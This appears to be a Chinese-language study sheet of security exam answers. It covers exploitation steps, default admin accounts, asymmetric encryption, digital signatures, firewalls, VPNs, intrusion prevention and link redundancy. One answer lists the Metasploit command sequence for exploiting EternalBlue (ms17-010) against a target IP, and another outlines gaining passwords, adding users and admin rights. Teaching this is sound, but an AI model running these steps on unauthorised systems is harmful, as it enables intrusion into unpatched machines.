簡述漏洞利用的一般過程

1對目標進行掃描

2對掃描獲得的信息進行分析研究，從而找出漏洞所在及其利用方法

3選用相應的工具，獲得密碼，添加用戶，獲得管理員權限等

寫出Metasploit對永恒之藍漏洞進行滲透的主要步驟

1啟動Metasploit，使用命令：msfconsole

2搜索ms17-010，使用命令：search ms17-010

3加載攻擊模塊，使用命令：use 0（0是永恒之藍攻擊模塊的編號）

4參考需要配置的參數，使用命令：show options

5配置攻擊模塊參數，使用命令：set rhosts ip地址

6滲透，使用命令：exploit

（命令全拚記不住可以使用tab鍵，例如msfc+tab）

寫出Windows和Linux中默認管理員的賬號

Windows：administrator

Linux：root

畫出非對稱加密的加密模型

明文——A加密（B公鑰）——B解密（B私鑰）——明文

畫出非對稱加密的認證模型

明文——A加密（A私鑰）——B解密（A公鑰）——明文

數字簽名能夠實現什麼功能

1收方能夠證實發方的真實身份

2發方事後不能否認所發送過的報文

3收方或者非法者不能偽造、篡改報文

舉例安全域的網絡結構區域名稱

運維管理區、應用服務區、數據庫服務器區、內網辦公區

（答題時請注意關鍵詞）

防火牆的作用

防火牆是一種位於內部網絡與外部網絡之間的網絡安全係統。是一項信息安全的防護係統，依照特定的規則，允許或是限製傳輸的數據通過

V-P-N的作用

V-P-N就是“虛擬專用網絡”。V-P-N的核心就是在利用公共網絡建立虛擬私有網。V-P-N主要采用隧道技術、加密技術、密鑰管理技術和使用者與設備身份認證技術（去掉橫杠）

入侵防禦設備的作用

入侵防禦係統是電腦網絡安全設施，是對防病毒軟件和防火牆的補充。入侵防禦係統是一部能夠監視網絡或網絡設備的網絡資料傳輸行為的計算機網絡安全設備，能夠及時的中斷、調整或隔離一些不正常或是具有傷害性的網絡資料傳輸行為

鏈路冗餘的作用

為了保持網絡的穩定性，在多台交換機組成的網絡環境中，通常都使用一些備份連接，以提高網絡的健壯性、穩定性，這裡的備份連接也稱為備份鏈路或者冗餘鏈路